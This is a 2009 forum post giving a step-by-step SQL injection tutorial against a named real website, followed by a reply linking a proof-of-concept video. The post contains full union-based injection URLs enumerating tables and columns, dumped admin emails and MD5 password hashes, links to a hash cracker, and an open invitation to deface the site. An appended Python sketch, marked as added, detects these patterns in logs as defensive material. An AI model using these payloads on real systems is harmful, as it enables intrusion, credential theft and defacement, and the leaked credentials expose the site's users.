UNKLAB FORUM

Universitas Klabat Students & Alumni Forum
 
[again] injecting with sql

Author: jzt.nwbie (Administrator)
Posted: Tue Apr 07, 2009 1:36 am

=================================================
dork : inurl:"mod.php?mod=publisher
place : myR00M
location : A****A
time : 00:35 wib
=================================================

/* ACTION START */

step by step

1. find a target:
http://www.duniaflora.com/mod.php?mod=publisher&op=viewarticle&cid=&artid=46

2. check for the bug:
code : ' or -
http://www.duniaflora.com/mod.php?mod=publisher&op=viewarticle&cid=&artid=46'

if there is an error (warning) like this:
Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in home/flora/public_html/mod/publisher/publisher.php on line 309

that means it can be injected; if there's no warning...
look for another target... you have to be patient...

NEXT ( --> ONCE YOU HAVE THE TARGET )

3. count the number of tables:
http://www.duniaflora.com/mod.php?mod=publisher&op=viewarticle&cid=&artid=-46+order+by+1
http://www.duniaflora.com/mod.php?mod=publisher&op=viewarticle&cid=&artid=-46+order+by+2
http://www.duniaflora.com/mod.php?mod=publisher&op=viewarticle&cid=&artid=-46+order+by+3
-->etc
http://www.duniaflora.com/mod.php?mod=publisher&op=viewarticle&cid=&artid=-46+order+by+11
-->end

in the end, it stops at the number 11... meaning there are 10 columns

4. find the lottery number:
http://www.duniaflora.com/mod.php?mod=publisher&op=viewarticle&cid=&artid=-46+union+all+select+1,2,3,4,5,6,7,8,9,10--

result: we get the number 3

5. find out the version:
code = @@version or version()

http://www.duniaflora.com/mod.php?mod=publisher&op=viewarticle&cid=&artid=-46+union+all+select+1,2,@@version,4,5,6,7,8,9,10--

6. find the table names:
code = group_concat(table_name)
+from+information_schema.tables+where+table_schema=database()--

http://www.duniaflora.com/mod.php?mod=publisher&op=viewarticle&cid=&artid=-46+union+all+select+1,2,group_concat(table_name),4,5,6,7,8,9,10+from+information_schema.tables+where+table_schema=database()--

and out come the tables...
authors,banner,bannerclient,counter,exchange_links,jos_adsmanager_ads,jos_adsmanager_categories,jos_adsmanager_columns,jos_adsmanager_config,jos_adsmanager_field_values,jos_adsmanager_fields,jos_adsmanager_positions,jos_adsmanager_profile,jos_components,jos_core_acl_aro,jos_core_acl_aro_groups,jos_core_acl_aro_sections,jos_core_acl_groups_

7. find the column names in the chosen table (chosen = authors):
code = group_concat(column_name)
+from+information_schema.columns+where+table_name=0x[column name converted from ascii to hex]--

beforehand, convert the ascii code of the table whose columns you want to view.

http://www.duniaflora.com/mod.php?mod=publisher&op=viewarticle&cid=&artid=-46+union+all+select+1,2,group_concat(column_name),4,5,6,7,8,9,10%20from%20information_schema.columns+where+table_name=0x617574686f7273--

8. view the table contents
http://www.duniaflora.com/mod.php?mod=publisher&op=viewarticle&cid=&artid=-46+union+all+select+1,2,group_concat(aid,0x3a,name,0x3a,url,0x3a,email,0x3a,pwd,0x3a,counter),4,5,6,7,8,9,10%20from%20authors

the result:
florakita:florakita::anantakarna@yahoo.com:979c8e8f8271e3431249f935cd7d3f4c:7,admin:admin::admin@admin.com:e6db7f33faf25a5dee7492f20b50b48d:13,duniaflora:editor::info@duniaflora.com:979c8e8f8271e3431249f935cd7d3f4c:27

all that's left is to decrypt the md5 pwd...

===============================================================================================================================================
/* END OF ACTION */

that's all for now...
don't feel like defacing right now, already sleepy...
if you want to continue on to a deface, go ahead guys...
be my guest...


now, it's time for me to sleep GUYZ...
have a nice dream...
see ya, tomorrow

===============================================================================

-=THANKS=-
- JC, FOR HIS BLESSING TO ME
- MY_B3L0V3D_M0M... LUV U
- MY_F4M1LY_BR0TH3R5_n_515T3R5...
- MY_GIRL_b094

-=GREETZ=-
* All UnKlab Forum Members
* All Hackers-Center Members

%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

N.B:

- Ascii to Hexa Converter
http://www.dolcevie.com/js/converter.html
- md5 crack
http://thesoftwareengineer.org/services/md5.php

%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

_________________
wanna be computer geek, nerd, etc...!!!
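
Added example (not part of the original post or thread): a Python sketch that flags the request patterns from the steps above in web-server access logs and shows which client moved from probing to extraction. The rule names, the log lines, the IP addresses and the timestamps are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Rule names are this example's own labels, one per step of the walkthrough.
RULES = [
    ("quote_probe",   re.compile(r"=[^&=]*'\s*(?:&|$)")),                    # step 2
    ("order_by_enum", re.compile(r"\border\s+by\s+\d+", re.I)),              # step 3
    ("union_select",  re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)),   # step 4
    ("version_probe", re.compile(r"@@version|\bversion\s*\(\s*\)", re.I)),   # step 5
    ("schema_lookup", re.compile(r"\binformation_schema\.(?:tables|columns)\b", re.I)),  # 6-7
]
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def classify(url):
    """Return the rule names matched by the decoded query string of one URL."""
    query = unquote_plus(url.partition("?")[2])
    return [name for name, rx in RULES if rx.search(query)]

def scan(lines):
    """Map client IP -> distinct rule hits, in the order first seen."""
    hits = defaultdict(list)
    for line in lines:
        m = REQUEST.match(line)
        if not m:
            continue
        ip, url = m.groups()
        for name in classify(url):
            if name not in hits[ip]:
                hits[ip].append(name)
    return dict(hits)

def escalating(hits, min_stages=3):
    """IPs whose requests moved through several stages: probing became extraction."""
    return sorted(ip for ip, names in hits.items() if len(names) >= min_stages)

# Constructed combined-log lines; IPs and timestamps are made up.
SAMPLE_LOG = """\
203.0.113.9 - - [07/Apr/2009:00:35:01 +0700] "GET /mod.php?mod=publisher&op=viewarticle&cid=&artid=46 HTTP/1.1" 200 5120
203.0.113.9 - - [07/Apr/2009:00:35:09 +0700] "GET /mod.php?mod=publisher&op=viewarticle&cid=&artid=46' HTTP/1.1" 200 812
203.0.113.9 - - [07/Apr/2009:00:36:40 +0700] "GET /mod.php?mod=publisher&op=viewarticle&cid=&artid=-46+order+by+11 HTTP/1.1" 200 812
203.0.113.9 - - [07/Apr/2009:00:37:15 +0700] "GET /mod.php?mod=publisher&op=viewarticle&cid=&artid=-46+union+all+select+1,2,@@version,4,5,6,7,8,9,10-- HTTP/1.1" 200 5033
203.0.113.9 - - [07/Apr/2009:00:38:02 +0700] "GET /mod.php?mod=publisher&op=viewarticle&cid=&artid=-46+union+all+select+1,2,group_concat(table_name),4,5,6,7,8,9,10+from+information_schema.tables+where+table_schema=database()-- HTTP/1.1" 200 6120
198.51.100.4 - - [07/Apr/2009:00:38:30 +0700] "GET /mod.php?mod=publisher&op=viewarticle&cid=&artid=12 HTTP/1.1" 200 4980
""".splitlines()

if __name__ == "__main__":
    for ip, names in scan(SAMPLE_LOG).items():
        print(ip, "->", ", ".join(names))
```

Pattern rules like these are a triage aid for logs; the application-side fix for the injectable `artid` parameter is a parameterised query with the value bound as an integer.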
Author: ZaNo (Whiz)
Posted: Sun Apr 19, 2009 11:19 am

nice tutorial..
btw does that site use eNdonesia CMS?

dropping the Proof Of Concept video here..
http://www.kitaupload.com/download.php?file=971SQL_Injection_HOWTO.rar